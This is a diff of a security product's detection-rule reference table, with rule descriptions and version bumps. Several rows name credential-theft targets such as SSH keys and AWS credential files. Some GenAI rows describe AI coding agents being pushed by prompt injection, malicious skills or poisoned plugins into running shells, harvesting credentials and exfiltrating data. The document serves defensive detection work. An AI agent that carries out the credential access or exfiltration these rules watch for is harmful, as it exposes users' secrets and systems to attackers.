@@ -542,7 +558,7 @@ and their rule type is `machine_learning`. |<> |Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |210 -|<> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: SentinelOne] |None |126 +|<> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: SentinelOne] |None |127 |<> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 
@@ -662,7 +678,7 @@ and their rule type is `machine_learning`. |<> |This rule leverages alert data from various Discovery building block rules to alert on signals with unusual unique host.id and user.id entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule], [Rule Type: BBR] |None |3 -|<> |This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Domain: Endpoint], [Tactic: Impact] |None |3 +|<> |This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Domain: Endpoint], [Tactic: Impact] |None |4 |<> |This rule identifies the creation of directories in the /bin directory. The /bin directory contains essential binary files that are required for the system to function properly. The creation of directories in this location could be an attempt to hide malicious files or executables, as these /bin directories usually just contain binaries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 
@@ -704,7 +720,7 @@ and their rule type is `machine_learning`. |<> |This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 -|<> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |214 +|<> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |215 |<> |Detects the creation of files related to the configuration of the dynamic linker on Linux systems. 
The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |8 
@@ -716,9 +732,9 @@ and their rule type is `machine_learning`. |<> |This rule identifies a sequence of events where a process named "entrypoint.sh" is started in a container, followed by a network connection attempt. This sequence indicates a potential egress connection from an entrypoint in a container. An entrypoint is a command or script specified in the Dockerfile and executed when the container starts. Attackers can use this technique to establish a foothold in the environment, escape from a container to the host, or establish persistence. |[Domain: Endpoint], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 +|<> |Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. 
|[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |113 -|<> |Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |1 +|<> |Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |2 |<> |This rule correlates any Elastic Defend alert with an email security related alert by target user name. This may indicate the successful execution of a phishing attack. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Check Point Harmony Email & Collaboration], [Domain: Email], [Domain: Endpoint] |None |3 
@@ -884,7 +900,7 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of DotNet ClickOnce installer via Dfsvc.exe trampoline. Adversaries may take advantage of ClickOnce to proxy execution of malicious payloads via trusted Microsoft processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |None |3 -|<> |Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. |[Domain: Endpoint], [Domain: LLM], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 +|<> |Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. |[Domain: Endpoint], [Domain: LLM], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. 
This may indicate a lateral movement attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |317 
@@ -936,7 +952,7 @@ and their rule type is `machine_learning`. |<> |Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |217 -|<> |This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |None |5 +|<> |This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |None |6 |<> |Identifies the creation or execution of files or processes with names containing the Right-to-Left Override (RTLO) character, which can be used to disguise the file extension and trick users into executing malicious files. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |3 
@@ -966,9 +982,15 @@ and their rule type is `machine_learning`. |<> |This rule detects the first time a principal calls AWS CloudFormation CreateStack, CreateStackSet or CreateStackInstances API. CloudFormation is used to create a collection of cloud resources called a stack, via a defined template file. An attacker with the appropriate privileges could leverage CloudFormation to create specific resources needed to further exploit the environment. This is a new terms rule that looks for the first instance of this behavior for a role or IAM user within a particular account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: CloudFormation], [Use Case: Asset Visibility], [Tactic: Execution], [Resources: Investigation Guide] |None |6 +|<> |Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + +|<> |Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise. 
|[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + +|<> |Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + |<> |An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a secret value from Secrets Manager using the GetSecretValue action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service would rely on its' attached role to access the secrets in Secrets Manager. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Secrets Manager], [Tactic: Credential Access], [Resources: Investigation Guide] |None |318 -|<> |Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |2 +|<> |Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |3 |<> |Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |11 
@@ -976,7 +998,7 @@ and their rule type is `machine_learning`. |<> |Identifies a new credentials logon type performed by an unusual process. This may indicate the existence of an access token forging capability that are often abused to bypass access control restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |110 -|<> |Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs], [Data Source: Sysmon] |None |115 +|<> |Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs], [Data Source: Sysmon] |None |116 |<> |Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 
@@ -996,7 +1018,7 @@ and their rule type is `machine_learning`. |<> |This detection correlates FortiGate's application control SOCKS events with Elastic Defend network event to identify the source process performing SOCKS traffic. Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: Fortinet], [Resources: Investigation Guide] |None |2 -|<> |Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Tactic: Initial Access], [Data Source: Fortinet], [Resources: Investigation Guide] |None |1 +|<> |Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Tactic: Initial Access], [Data Source: Fortinet], [Resources: Investigation Guide] |None |2 |<> |This rule detects a FortiCloud SSO login followed by administrator account creation on the same FortiGate device within 15 minutes. This sequence is a high-confidence indicator of the FG-IR-26-060 attack pattern, where threat actors authenticate via SAML-based SSO bypass and immediately create local administrator accounts for persistence. 
|[Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Domain: Network], [Domain: Identity], [Data Source: Fortinet], [Data Source: Fortinet FortiGate] |None |1 
@@ -1060,13 +1082,13 @@ and their rule type is `machine_learning`.
 |<> |Detects when macOS Gatekeeper is overridden followed by execution of the same binary from a suspicious location. This behavior indicates an attempt to bypass Apple's security controls and execute potentially malicious software downloaded from the internet. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1
-|<> |Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0085], [Mitre Atlas: T0085.001], [Mitre Atlas: T0055] |None |3
+|<> |Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented.
|[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0085], [Mitre Atlas: T0085.001], [Mitre Atlas: T0055] |None |4
 |<> |Detects when GenAI tools spawn compilers or packaging tools to generate executables. Attackers leverage local LLMs to autonomously generate and compile malware, droppers, or implants. Python packaging tools (pyinstaller, nuitka, pyarmor) are particularly high-risk as they create standalone executables that can be deployed without dependencies. This rule focuses on compilation activity that produces output binaries, filtering out inspection-only operations. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Auditd Manager], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0053] |None |1
 |<> |Detects when GenAI tools connect to domains using suspicious TLDs commonly abused for malware C2 infrastructure. TLDs like .top, .xyz, .ml, .cf, .onion are frequently used in phishing and malware campaigns. Legitimate GenAI services use well-established domains (.com, .ai, .io), so connections to suspicious TLDs may indicate compromised tools, malicious plugins, or AI-generated code connecting to attacker infrastructure. |[Domain: Endpoint], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |1
-|<> |Detects GenAI tools connecting to unusual domains on macOS.
Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |3
+|<> |Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |4
 |<> |Detects when GenAI processes perform encoding or chunking (base64, gzip, tar, zip) followed by outbound network activity. This sequence indicates data preparation for exfiltration. Attackers encode or compress sensitive data before transmission to obfuscate contents and evade detection. Legitimate GenAI workflows rarely encode data before network communications. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |1
@@ -1188,6 +1210,8 @@ and their rule type is `machine_learning`.
 |<> |Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212
+|<> |Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app. |[Data Source: IBM QRadar], [Use Case: Threat Detection], [Resources: Investigation Guide], [Promotion: External Alerts] |None |1
+
 |<> |Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |316
 |<> |This rule detects events that could be describing IPSEC NAT Traversal traffic. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal enables these tunnels to communicate over the Internet where one of the sides is behind a NAT router gateway. This may be common on your network, but this technique is also used by threat actors to avoid detection.
|[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |108 
@@ -1214,7 +1238,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies indirect command execution via Program Compatibility Assistant (pcalua.exe) or forfiles.exe. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |107
-|<> |Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11
+|<> |Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |12
 |<> |This rule detects potential initial access activity where an adversary uploads a web shell or malicious script to a web server via a file upload mechanism (e.g., through a web form using multipart/form-data), followed by a GET or POST request to access the uploaded file. By checking the body content of HTTP requests for file upload indicators such as "Content-Disposition: form-data" and "filename=", the rule identifies suspicious upload activities. This sequence of actions is commonly used by attackers to gain and maintain access to compromised web servers.
|[Domain: Endpoint], [Domain: Web], [Domain: Network], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Network Traffic], [Resources: Investigation Guide] |None |1 
@@ -1258,7 +1282,7 @@ and their rule type is `machine_learning`.
 |<> |This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |112
-|<> |This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Threat: Rootkit], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1
+|<> |This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system.
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Threat: Rootkit], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2
 |<> |Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspicious or malicious behavior. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Threat: Rootkit], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |216
@@ -1330,6 +1354,8 @@ and their rule type is `machine_learning`.
 |<> |This rule detects when a user creates a pod/container running in privileged mode. A highly privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the underlying host. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |209
+|<> |Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. |[Data Source: Kubernetes], [Domain: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Collection], [Resources: Investigation Guide] |None |1
+
 |<> |This rule detects the creation or modification of sensitive Kubernetes configuration files on Linux systems.
These files include Kubernetes manifests, PKI files, and configuration files that are critical for the operation of Kubernetes clusters. Monitoring these files helps identify potential unauthorized changes or misconfigurations that could lead to security vulnerabilities in Kubernetes environments. Attackers may attempt to modify these files to gain persistence or to deploy malicious containers within the Kubernetes cluster. |[Domain: Endpoint], [Domain: Kubernetes], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2
 |<> |Detects a sequence where a principal creates or modifies a Role/ClusterRole to include high-risk permissions (e.g., wildcard access or escalation verbs) and then creates or patches a workload resource (DaemonSet, Deployment, or CronJob) shortly after, which may indicate RBAC-based privilege escalation followed by payload deployment. This pattern is often used by adversaries to gain unauthorized access to sensitive resources and deploy malicious payloads. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1
